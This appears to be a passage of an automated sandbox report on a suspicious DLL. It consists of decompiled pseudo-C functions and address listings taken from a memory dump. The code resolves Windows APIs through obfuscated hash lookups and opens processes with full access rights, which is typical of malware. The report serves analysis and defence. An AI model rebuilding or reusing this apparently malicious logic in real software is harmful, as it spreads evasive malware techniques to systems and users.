							_t403 = E6E86F4BC(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6E873064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6E86F4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6E86F828( *((intOrPtr*)(_t439 + 8)), E6E86F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6E86F4BC( *((intOrPtr*)(_t439 + 8)), E6E86F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6E86F4BC(_t439 + 0x28,  *(_t439 + 0x70));
										E6E86F828( *((intOrPtr*)(_t439 + 4)), E6E86F4CC( *_t439) + 4);
										 *(E6E86F4BC( *((intOrPtr*)(_t439 + 4)), E6E86F4CC( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E86F4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6E86F4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6E86F4CC( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6E86F4CC( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6E86F4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6E86F4BC( *((intOrPtr*)(_t439 + 4)), _t420);
										E6E8738F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6E86F4CC( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6E86F828( *((intOrPtr*)(_t439 + 4)), E6E86F4CC( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6E873064(0x60a28c5c, 0xe96b154c);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6E86F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6E86F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6E86F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6E86F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6E86F4BC( *((intOrPtr*)(_t439 + 8)), _t422);
										E6E8738F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6E86F4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6E86F828( *((intOrPtr*)(_t439 + 8)), E6E86F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E86F4BC(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6e86a4f2
0x6e86a4f4
0x6e86a4ff
0x6e86a505
0x6e86a509
0x6e86a50e
0x6e86a514
0x6e86a524
0x00000000
0x6e86a526
0x6e86a526
0x6e86a531
0x6e86a531
0x6e86aaaf
0x6e86aab1
0x6e86aab2
0x6e86aaf1
0x6e86aaf5
0x6e86ab03
0x6e86ab11
0x6e86ab11
0x6e86aafc
0x6e86ab17
0x6e86ab1c
0x00000000
0x6e86ab1c
0x6e86ab00
0x6e86ab01
0x00000000
0x6e86a53b
0x6e86a53b
0x6e86a53f
0x6e86a646
0x6e86a646
0x6e86a64b
0x6e86a75c
0x6e86a760
0x6e86a765
0x6e86a769
0x6e86a893
0x6e86a895
0x6e86a899
0x6e86a8a2
0x6e86a8ab
0x6e86a8af
0x6e86a8b8
0x6e86a8bf
0x6e86a8c0
0x6e86a8c4
0x6e86a8c8
0x6e86a8cc
0x6e86a8ce
0x6e86aa38
0x6e86aa38
0x6e86aa40
0x6e86aa58
0x6e86aa5a
0x6e86aa5c
0x6e86aa96
0x6e86aa96
0x6e86aa98
0x6e86aa98
0x6e86aa9b
0x6e86aab6
0x6e86aaca
0x6e86aacd
0x6e86aad2
0x6e86aadd
0x6e86aade
0x6e86aae1
0x6e86aae3
0x6e86aaec
0x00000000
0x6e86aaec
0x6e86aa9d
0x6e86aaa1
0x6e86aaaa
0x00000000
0x6e86aaaa
0x6e86aa6d
0x6e86aa7d
0x6e86aa81
0x6e86aa81
0x6e86aa84
0x6e86aa87
0x6e86aa8a
0x6e86aa90
0x00000000
0x00000000
0x00000000
0x6e86aa92
0x6e86a8d6
0x6e86a8d6
0x6e86a8d8
0x6e86a8dc
0x6e86a8e1
0x6e86a8e3
0x6e86a8e7
0x6e86a8ea
0x6e86a8f2
0x6e86a8f4
0x00000000
0x00000000
0x6e86a90b
0x6e86a926
0x6e86a928
0x6e86a93b
0x6e86a93d
0x6e86a93f
0x6e86a95a
0x6e86a95a
0x6e86a95e
0x6e86a960
0x00000000
0x00000000
0x6e86a962
0x6e86a965
0x6e86a986
0x6e86a9a5
0x6e86a9ab
0x6e86a9ae
0x6e86a9b3
0x6e86a9b4
0x6e86a9b8
0x00000000
0x00000000
0x6e86a9c0
0x6e86a9c0
0x6e86a9c2
0x6e86a9ce
0x6e86a9da
0x6e86a9e4
0x6e86a9e7
0x6e86a9ea
0x6e86a9ee
0x6e86a9f5
0x6e86a9f9
0x6e86a9fd
0x6e86a9fe
0x6e86aa02
0x6e86aa07
0x6e86aa0c
0x6e86aa10
0x6e86aa14
0x6e86aa1a
0x6e86aa20
0x6e86aa26
0x6e86aa2c
0x6e86aa31
0x6e86aa32
0x6e86aa32
0x00000000
0x6e86a9c2
0x00000000
0x6e86a965
0x6e86a943
0x6e86a954
0x6e86a956
0x6e86a958
0x00000000
0x00000000
0x00000000
0x6e86a958
0x6e86a96b
0x00000000
0x6e86a96b
0x6e86a76f
0x6e86a772
0x6e86a774
0x00000000
0x00000000
0x6e86a77c
0x6e86a77c
0x6e86a77e
0x6e86a77e
0x6e86a78f
0x6e86a791
0x6e86a794
0x00000000
0x00000000
0x6e86a88a
0x6e86a88b
0x6e86a88d
0x00000000
0x00000000
0x00000000
0x6e86a88d
0x6e86a79a
0x6e86a79d
0x6e86a7a7
0x6e86a7ac
0x6e86a7ae
0x6e86a7b4
0x6e86a7bb
0x6e86a7bf
0x6e86a7c4
0x6e86a7c8
0x6e86ac03
0x6e86ac17
0x6e86ac3a
0x6e86ac3f
0x6e86ac3f
0x6e86a7df
0x6e86a7e4
0x6e86a7e4
0x6e86a7e4
0x6e86a7e4
0x6e86a7ea
0x6e86a7ef
0x6e86a7f1
0x6e86a7f6
0x6e86a7fd
0x6e86a802
0x6e86a804
0x6e86abc1
0x6e86abd2
0x6e86abec
0x6e86abf1
0x6e86abf1
0x6e86a81a
0x6e86a81f
0x6e86a81f
0x6e86a81f
0x6e86a81f
0x6e86a833
0x6e86a851
0x6e86a856
0x6e86a866
0x6e86a883
0x6e86a885
0x6e86a885
0x00000000
0x6e86a79d
0x6e86a653
0x6e86a653
0x6e86a655
0x6e86a65c
0x6e86a66a
0x6e86a66c
0x6e86a66f
0x6e86a676
0x6e86a678
0x6e86a6a9
0x6e86a6b8
0x6e86a6ba
0x6e86a6bc
0x6e86a6da
0x6e86a6dc
0x6e86a6de
0x6e86a6f1
0x6e86a710
0x6e86a716
0x6e86a719
0x6e86a730
0x6e86a74c
0x6e86a74e
0x6e86a74e
0x6e86a74e
0x6e86a74e
0x6e86a6de
0x00000000
0x6e86a6bc
0x6e86a67c
0x6e86a67c
0x6e86a67e
0x6e86a68f
0x6e86a691
0x6e86a693
0x00000000
0x00000000
0x6e86a69f
0x6e86a6a0
0x6e86a6a7
0x00000000
0x00000000
0x00000000
0x6e86a6a7
0x6e86a695
0x6e86a698
0x00000000
0x00000000
0x6e86a751
0x6e86a751
0x6e86a752
0x6e86a752
0x00000000
0x6e86a545
0x6e86a547
0x6e86a547
0x6e86a549
0x6e86a550
0x6e86a55e
0x6e86a560
0x6e86a564
0x6e86a568
0x6e86a56a
0x6e86a598
0x6e86a59b
0x6e86a5a0
0x6e86a5a4
0x6e86a5a9
0x6e86a5b0
0x6e86a5b5
0x6e86a5b7
0x6e86ab7e
0x6e86ab8f
0x6e86abaf
0x6e86abb4
0x6e86abb4
0x6e86a5cd
0x6e86a5d2
0x6e86a5d2
0x6e86a5d2
0x6e86a5d2
0x6e86a5e4
0x6e86a5e6
0x6e86a5e8
0x6e86a5f9
0x6e86a5f9
0x6e86a5ff
0x6e86a604
0x6e86a608
0x6e86a60e
0x6e86a615
0x6e86a61a
0x6e86a61c
0x6e86ab32
0x6e86ab43
0x6e86ab64
0x6e86ab69
0x6e86ab69
0x6e86a633
0x6e86a638
0x6e86a638
0x6e86a638
0x6e86a638
0x6e86a63b
0x6e86a63b
0x00000000
0x6e86a63b
0x6e86a56e
0x6e86a56e
0x6e86a570
0x6e86a581
0x6e86a583
0x6e86a585
0x00000000
0x00000000
0x6e86a591
0x6e86a592
0x6e86a596
0x00000000
0x00000000
0x00000000
0x6e86a596
0x6e86a587
0x6e86a58a
0x00000000
0x00000000
0x6e86a63c
0x6e86a63c
0x6e86a63d
0x6e86a63d
0x00000000
0x6e86a549
0x6e86a53f

Strings

, xrefs: 6E86AAF7

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: acb91ec53d88468598cd87b4d24050d7fff70391263addf1f5d522b22192b38a
Instruction ID: b31c38a5a636e691587ae9c9d91fc66945c091dd0b6292580b2575824f70c941
Opcode Fuzzy Hash: acb91ec53d88468598cd87b4d24050d7fff70391263addf1f5d522b22192b38a
Instruction Fuzzy Hash: 5112B4715083119FC714DFA8C980AAEB7E9EFD5704F108E6DE999972A1DB30ED01CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6E868428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6E868428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6E86B658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6E86F4D0(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6E86F654(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6E872234(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6E86F654(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6E86F584(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6E86F584(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6E86F4BC(_t449 + 0x14, 0);
									_t180 = E6E872908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6E86B5C4(_t449 + 0x34);
										E6E86B5C4(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6E86F4BC( *(_t449 + 4), _t315 << 2)));
										_t188 = E6E86F4BC( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6E86B5C4(_t449 + 0x34);
										E6E86B5C4(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6E86CA8C(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6E86C280(_t343);
									if(__eflags != 0) {
										break;
									}
									E6E86F828(_t449 + 0x14, E6E86F4CC(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6E86F4BC(_t449 + 0x14, E6E86F4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6E873064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6E86F828(_t449 + 0x40, E6E86F4CC(_t449 + 0x3c) + 4);
											 *(E6E86F4BC(_t449 + 0x40, E6E86F4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6E86CD24(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6E86F4BC( *(_t449 + 4), _t431 * 4);
												_t212 = E6E86F4BC(_t449 + 0x40, _t431 * 4);
												E6E868B58( *_t211, E6E8702B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6E86CD24(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6E86F4BC(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6E86F4CC( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6E86F4CC( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6E86F4BC( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6E86F4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6E8738F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6E86F4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6E86F828( *(_t449 + 4), E6E86F4CC( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6E86F4CC(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6E86F4CC(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6E86F4BC(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6E86F4BC(_t322, _t430);
										E6E8738F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6E86F4CC(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6E86F828(_t322, E6E86F4CC(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6E86F828( *(_t449 + 4), E6E86F4CC( *_t449) + 4);
								 *(E6E86F4BC( *(_t449 + 4), E6E86F4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6E86F828(_t322, E6E86F4CC(_t322) + 4);
								 *(E6E86F4BC(_t322, E6E86F4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6E86F4BC(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6E873064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6E86F4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6E86F828( *(_t449 + 4), E6E86F4CC( *_t449) + 4);
										 *(E6E86F4BC( *(_t449 + 4), E6E86F4CC( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6E86F4BC(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6E86F828( *((intOrPtr*)(_t449 + 0x74)), E6E86F4CC( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6E86F4BC( *((intOrPtr*)(_t449 + 0x74)), E6E86F4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6E86F4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6E86F4BC( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6E86F4CC( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6E86F4CC(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6E86F4BC(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6E86F4BC(_t430, _t443);
										E6E8738F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6E86F4CC(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6E86F828(_t430, E6E86F4CC(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6E873064(0x60a28c5c, 0xe96b154c);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6E86F4BC( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6E86F4CC( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6E86F4CC( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6E86F4BC( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6E86F4BC( *(_t449 + 4), _t445);
										E6E8738F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6E86F4CC( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6E86F828( *(_t449 + 4), E6E86F4CC( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6E86F4BC(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6e868435
0x6e86843b
0x6e86843f
0x6e868443
0x6e86844e
0x6e868452
0x6e868457
0x6e86845f
0x6e86846f
0x00000000
0x6e868471
0x6e868479
0x6e868480
0x6e868480
0x6e8689d3
0x6e8689d5
0x6e868a16
0x6e868a18
0x6e868a27
0x6e868a33
0x6e868a33
0x6e868a22
0x6e868a39
0x6e868a3e
0x00000000
0x6e868a3e
0x6e868a26
0x00000000
0x6e86848a
0x6e86848e
0x6e868491
0x6e868599
0x6e868599
0x6e86859e
0x6e8686c1
0x6e8686c5
0x6e8686ca
0x6e8686ce
0x6e8686d2
0x6e868808
0x6e86880a
0x6e86880e
0x6e868817
0x6e868822
0x6e868826
0x6e86882f
0x6e868834
0x6e86883a
0x6e86883b
0x6e86883f
0x6e868843
0x6e86884a
0x6e86884c
0x6e86898c
0x6e86899d
0x6e8689a4
0x6e8689ab
0x6e8689ab
0x6e8689ae
0x6e8689b1
0x6e8689b4
0x6e8689ba
0x6e8689c1
0x6e8689c5
0x6e8689ce
0x00000000
0x6e8689ce
0x6e8689bc
0x6e8689bf
0x6e8689d8
0x6e8689f0
0x6e8689f3
0x6e8689f8
0x6e868a02
0x6e868a05
0x6e868a08
0x6e868a11
0x00000000
0x6e868a11
0x00000000
0x6e8689bf
0x6e868854
0x6e868854
0x6e868856
0x6e86885a
0x6e86885f
0x6e868861
0x6e868865
0x6e868868
0x6e868870
0x6e868872
0x00000000
0x00000000
0x6e868889
0x6e8688a4
0x6e8688a6
0x6e8688b4
0x6e8688b9
0x6e8688bb
0x6e8688d8
0x6e8688d8
0x6e8688dc
0x6e8688de
0x00000000
0x00000000
0x6e8688e0
0x6e8688e3
0x6e868904
0x6e868923
0x6e868929
0x6e86892c
0x6e868931
0x6e868932
0x6e868939
0x00000000
0x00000000
0x6e868941
0x6e868941
0x6e868943
0x6e86894f
0x6e86895b
0x6e86897d
0x6e868982
0x6e868983
0x6e868983
0x00000000
0x6e868943
0x00000000
0x6e8688e3
0x6e8688bd
0x6e8688c3
0x6e8688c5
0x6e8688c6
0x6e8688c7
0x6e8688c8
0x6e8688cc
0x6e8688d0
0x6e8688d2
0x6e8688d3
0x6e8688d4
0x6e8688d6
0x00000000
0x00000000
0x00000000
0x6e8688d6
0x6e8688e9
0x00000000
0x6e8688e9
0x6e8686d8
0x6e8686da
0x6e8686dc
0x00000000
0x00000000
0x6e8686e6
0x6e8686e6
0x6e8686e8
0x6e8686eb
0x6e8686ed
0x6e8686f5
0x6e8686fc
0x6e868700
0x6e868703
0x00000000
0x00000000
0x6e8687ff
0x6e868800
0x6e868802
0x00000000
0x00000000
0x00000000
0x6e868802
0x6e868709
0x6e86870c
0x6e868715
0x6e86871a
0x6e86871c
0x6e868728
0x6e86872c
0x6e868731
0x6e868735
0x6e868b12
0x6e868b26
0x6e868b48
0x6e868b4d
0x6e868b4d
0x6e86874b
0x6e868750
